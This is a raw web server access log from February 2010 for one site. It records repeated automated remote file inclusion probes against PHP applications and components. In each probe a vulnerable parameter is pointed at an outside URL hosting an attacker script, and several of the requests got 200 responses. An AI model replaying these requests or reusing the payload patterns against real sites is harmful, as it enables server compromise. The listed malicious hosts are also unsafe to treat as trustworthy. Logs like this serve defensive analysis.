62.67.235.148 - - [14/Feb/2010:07:42:24 -0800] "GET /delete_all.php?board_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:07:42:24 -0800] "GET /logs//delete_all.php?board_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:07:42:28 -0800] "GET /logs/access_100117.log%20%20/become_editor.php?theme_path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:07:42:29 -0800] "GET /logs/access_100129.log//delete_all.php?board_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:07:42:29 -0800] "GET /delete_all.php?board_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:07:42:29 -0800] "GET /logs//delete_all.php?board_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:07:42:34 -0800] "GET /logs/access_100112.log%20%20//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:07:42:34 -0800] "GET /logs/access_100112.log%20%20//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:07:42:48 -0800] "GET /logs/access_100202.log//delete_all.php?board_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
62.67.235.148 - - [14/Feb/2010:07:42:55 -0800] "GET /logs/access_100202.log//delete_all.php?board_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:07:43:31 -0800] "GET /logs/access_100122.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [14/Feb/2010:07:43:45 -0800] "GET /logs/access_100105.log/errors.php?error=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:07:43:59 -0800] "GET /logs/access_100203.log/become_editor.php?theme_path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:07:44:21 -0800] "GET /logs/access_100127.log/become_editor.php?theme_path=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:07:44:30 -0800] "GET /logs/access_100109.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:07:44:30 -0800] "GET /logs//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:07:44:30 -0800] "GET /errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:07:44:42 -0800] "GET /logs/access_100114.log%20%20//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [14/Feb/2010:07:44:47 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [14/Feb/2010:07:44:47 -0800] "GET /logs/access_100125.log////write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.3.101 - - [14/Feb/2010:07:44:47 -0800] "GET ///write_comment_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:07:44:53 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:07:44:53 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:07:44:53 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:07:45:30 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:07:45:30 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:07:45:31 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:07:45:34 -0800] "GET /logs/access_100130.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:07:45:34 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:07:45:34 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:07:45:35 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:07:45:35 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:07:45:36 -0800] "GET /logs/access_100130.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [14/Feb/2010:07:47:28 -0800] "GET /logs/access_100119.log//index.php?DOCUMENT_ROOT=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [14/Feb/2010:07:47:28 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [14/Feb/2010:07:47:28 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [14/Feb/2010:07:47:28 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
110.11.20.12 - - [14/Feb/2010:07:47:30 -0800] "GET /logs/access_100122.log%20%20//?_zb_path=http://www.opalo.tv/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.11.20.12 - - [14/Feb/2010:07:47:30 -0800] "GET /logs//?_zb_path=http://www.opalo.tv/byz9991.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
110.11.20.12 - - [14/Feb/2010:07:47:32 -0800] "GET /?_zb_path=http://www.opalo.tv/byz9991.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
121.88.4.74 - - [14/Feb/2010:07:47:59 -0800] "GET /logs/access_100124.log/?sPath=http://www.hankooknano.com/bbs/text/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.186.58.214 - - [14/Feb/2010:07:48:34 -0800] "GET /logs/access_100105.log///vwar/backup/errors.php?error=http://alienweb-irc.net/gossid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:48:57 -0800] "GET /index.php?place=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:48:57 -0800] "GET /logs/index.php?place=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:48:57 -0800] "GET /logs/access_100109.log%20%20/index.php?place=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:49:14 -0800] "GET /logs/index.php?place=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:49:14 -0800] "GET /logs/access_100109.log%20%20/index.php?place=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:49:15 -0800] "GET /index.php?place=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:49:18 -0800] "GET /logs/index.php?place=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:49:18 -0800] "GET /index.php?place=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:49:19 -0800] "GET /logs/access_100109.log%20%20/index.php?place=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:49:19 -0800] "GET /index.php?place=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:49:20 -0800] "GET /logs/index.php?place=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:49:20 -0800] "GET /logs/access_100109.log%20%20/index.php?place=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:49:21 -0800] "GET /logs/index.php?place=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:49:21 -0800] "GET /logs/access_100109.log%20%20/index.php?place=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [14/Feb/2010:07:49:22 -0800] "GET /index.php?place=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
204.12.11.202 - - [14/Feb/2010:07:49:30 -0800] "GET /logs/access_100125.log%20%20//errors.php?error=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.12.11.202 - - [14/Feb/2010:07:49:33 -0800] "GET /logs/access_100202.log%20%20//errors.php?error=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:07:50:38 -0800] "GET /logs/access_100107.log///vwar/backup/errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:07:50:39 -0800] "GET //vwar/backup/errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:07:50:39 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:51:23 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:51:24 -0800] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:51:24 -0800] "GET /logs/access_100125.log%20%20/components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:51:37 -0800] "GET /logs/access_100111.log%20%20/components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:07:51:52 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:07:51:52 -0800] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:07:51:52 -0800] "GET /logs/access_100125.log%20%20/components/com_facileforms/facileforms.frame.php?ff_compath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:07:52:09 -0800] "GET /logs/access_100111.log%20%20/components/com_facileforms/facileforms.frame.php?ff_compath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [14/Feb/2010:07:52:35 -0800] "GET /logs/access_100129.log/index.php?g4[path]=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [14/Feb/2010:07:52:35 -0800] "GET /logs/index.php?g4[path]=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [14/Feb/2010:07:52:36 -0800] "GET /index.php?g4[path]=http://neokult.com/img/open.jpg??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:53:10 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:53:10 -0800] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [14/Feb/2010:07:53:10 -0800] "GET /logs/access_100111.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [14/Feb/2010:07:53:46 -0800] "GET /delete.php?board_skin_path=http://sahnsem.com/main/bbs/calendar/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [14/Feb/2010:07:53:46 -0800] "GET /logs/access_100203.log%20%20/delete.php?board_skin_path=http://sahnsem.com/main/bbs/calendar/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [14/Feb/2010:07:53:46 -0800] "GET /logs/delete.php?board_skin_path=http://sahnsem.com/main/bbs/calendar/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:07:54:59 -0800] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:07:54:59 -0800] "GET /logs/access_100125.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:07:54:59 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:07:55:24 -0800] "GET /logs/access_100111.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [14/Feb/2010:07:55:53 -0800] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [14/Feb/2010:07:55:53 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [14/Feb/2010:07:55:53 -0800] "GET /logs/access_100125.log%20%20/components/com_facileforms/facileforms.frame.php?ff_compath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [14/Feb/2010:07:56:08 -0800] "GET /delete.php?board_skin_path=http://sahnsem.com/main/bbs/calendar/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [14/Feb/2010:07:56:08 -0800] "GET /logs/access_100203.log%20%20/delete.php?board_skin_path=http://sahnsem.com/main/bbs/calendar/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [14/Feb/2010:07:56:08 -0800] "GET /logs/delete.php?board_skin_path=http://sahnsem.com/main/bbs/calendar/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [14/Feb/2010:07:56:29 -0800] "GET /logs/access_100111.log%20%20/components/com_facileforms/facileforms.frame.php?ff_compath=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [14/Feb/2010:07:56:40 -0800] "GET /logs/access_100129.log%20%20/index.php?g4[path]=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [14/Feb/2010:07:56:40 -0800] "GET /logs/index.php?g4[path]=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [14/Feb/2010:07:56:41 -0800] "GET /index.php?g4[path]=http://neokult.com/img/open.jpg??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:07:57:32 -0800] "GET //vwar/backup/errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:07:57:32 -0800] "GET /logs/access_100107.log%20%20///vwar/backup/errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:07:57:32 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:07:58:09 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:07:58:09 -0800] "GET /logs/access_100114.log//index.php?_SERVER[DOCUMENT_ROOT]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:07:58:14 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:07:58:43 -0800] "GET /logs/access_100114.log//index.php?_SERVER[DOCUMENT_ROOT]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:07:58:43 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:07:58:46 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:07:59:16 -0800] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:07:59:16 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:07:59:16 -0800] "GET /logs/access_100104.log%20%20/components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:07:59:16 -0800] "GET /logs/access_100129.log%20%20/components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:07:59:16 -0800] "GET /logs/access_100115.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:07:59:17 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:07:59:20 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:07:59:41 -0800] "GET /logs/access_100115.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:07:59:46 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:07:59:49 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:00:05 -0800] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:00:08 -0800] "GET /logs/access_100125.log%20%20/components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [14/Feb/2010:08:00:20 -0800] "GET /delete.php?board_skin_path=http://sahnsem.com/main/bbs/calendar/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [14/Feb/2010:08:00:20 -0800] "GET /logs/delete.php?board_skin_path=http://sahnsem.com/main/bbs/calendar/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [14/Feb/2010:08:00:20 -0800] "GET /logs/access_100121.log%20%20/delete.php?board_skin_path=http://sahnsem.com/main/bbs/calendar/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [14/Feb/2010:08:00:26 -0800] "GET /delete.php?board_skin_path=http://sahnsem.com/main/bbs/calendar/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [14/Feb/2010:08:00:26 -0800] "GET /logs/delete.php?board_skin_path=http://sahnsem.com/main/bbs/calendar/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [14/Feb/2010:08:00:26 -0800] "GET /logs/access_100121.log%20%20/delete.php?board_skin_path=http://sahnsem.com/main/bbs/calendar/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
